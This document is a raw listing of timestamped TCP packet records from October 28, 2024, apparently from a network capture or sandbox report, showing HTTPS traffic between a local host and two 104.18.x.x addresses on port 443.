                                                                                                                                                Oct 28, 2024 17:47:58.940023899 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:58.940408945 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.940644026 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.940695047 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:58.940701962 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941301107 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941334009 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941351891 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:58.941359043 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941385031 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941401005 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:58.941410065 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:58.941452980 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:59.060420990 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.060482979 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.060516119 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.060600042 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.060626984 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:59.060692072 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:59.060978889 CET49767443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:47:59.060998917 CET44349767104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.480524063 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.480967999 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.481008053 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.481353998 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.481815100 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.481889009 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.482122898 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.527358055 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619121075 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619175911 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619208097 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619240999 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619270086 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619272947 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.619302988 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619323015 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.619347095 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619355917 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.619363070 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.619400024 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.619704008 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.665539980 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.665551901 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.713553905 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.735775948 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.735845089 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.735898018 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.735914946 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.736159086 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.736202002 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.736206055 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.736216068 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.736260891 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.736268044 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.737023115 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.737073898 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.737076998 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.737087011 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.737128019 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.873684883 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.873753071 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.873796940 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.873807907 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.873821020 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.873867035 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.873874903 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.874108076 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.874144077 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.874159098 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.874166012 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.874207020 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.874221087 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.893048048 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.893197060 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.893198967 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.893210888 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.893259048 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.990411997 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.990619898 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.990684032 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.990685940 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.990698099 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.990747929 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.990767002 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.991569042 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:47:59.991633892 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:47:59.991645098 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.009927034 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.009955883 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.010027885 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.010036945 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.010082006 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.107655048 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.107717037 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.107749939 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.107817888 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.107836008 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.107927084 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.127123117 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.127285957 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.127444983 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.127521038 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.224714994 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.224832058 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.225079060 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.225142956 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.243772984 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.243833065 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.244167089 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.244229078 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.341253042 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.341358900 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.341461897 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.341537952 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.341922045 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.341993093 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.361095905 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.361263990 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.361424923 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.361567020 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.458106041 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.458230019 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.458837032 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.458904982 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.477818012 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.477936029 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.478035927 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.478099108 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.478108883 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.478187084 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.478235960 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.478382111 CET49769443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.478395939 CET44349769104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.484416962 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:00.484468937 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.484591007 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:00.484786034 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:00.484811068 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.628801107 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.628854036 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:00.628961086 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.629288912 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:00.629307032 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.108175993 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.108514071 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.108551025 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.108891010 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.109198093 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.109262943 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.109319925 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.149574995 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.149612904 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.237643003 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.237946987 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.237979889 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.238325119 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.238641977 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.238708973 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.238785028 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.238831043 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.238864899 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252038956 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252106905 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252142906 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252171993 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252180099 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.252202988 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252213955 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252238989 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.252274036 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.252649069 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252773046 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252799988 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252829075 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.252854109 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.252911091 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.368618011 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.368864059 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.368921995 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.368937969 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.369082928 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.369112968 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.369134903 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.369139910 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.369189024 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.369193077 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.370038986 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.370093107 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.370101929 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.420545101 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.420556068 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.468530893 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.472282887 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472332954 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472373009 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472395897 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.472402096 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472426891 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472459078 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.472498894 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472527027 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472541094 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.472548008 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.472588062 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.472594976 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.485716105 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486002922 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486066103 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.486069918 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486078978 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486135960 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.486140966 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486531973 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486572027 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486582041 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.486587048 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.486638069 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.486640930 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.515592098 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.515630960 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.531554937 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.552295923 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.552365065 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.552429914 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.552469015 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.563559055 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.589396954 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.589473963 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.589507103 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.589561939 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.589601994 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.589665890 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.589680910 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.590121984 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.590154886 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.590189934 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.590197086 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.590236902 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.590244055 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.596127033 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.603353977 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603416920 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603451014 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603482962 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.603511095 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603571892 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.603631020 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603708029 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.603761911 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.603777885 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.642571926 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.642596006 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.658535004 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.684269905 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.684340954 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.684411049 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.684421062 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.690551043 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.706674099 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.706753016 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.706784964 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.706808090 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.706819057 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.706870079 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.706878901 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.707098007 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.707143068 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.707150936 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.707906008 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.707947016 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.707963943 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.707973003 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.708013058 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.708018064 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.708026886 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.708084106 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.721009016 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.721079111 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.721086979 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.721087933 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.721126080 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.721164942 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.770656109 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.770693064 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.784480095 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.784528017 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.784537077 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.784601927 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.784611940 CET44349770104.18.95.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.784657001 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.824678898 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.824743986 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.824779987 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.824804068 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.824830055 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.824876070 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.824956894 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.825043917 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.825083971 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.825093031 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.825108051 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.825145006 CET49771443192.168.2.16104.18.94.41
                                                                                                                                                Oct 28, 2024 17:48:01.825834036 CET44349771104.18.94.41192.168.2.16
                                                                                                                                                Oct 28, 2024 17:48:01.834522963 CET49770443192.168.2.16104.18.95.41
                                                                                                                                                Oct 28, 2024 17:48:01.837219954 CET44349770104.18.95.41192.168.2.16
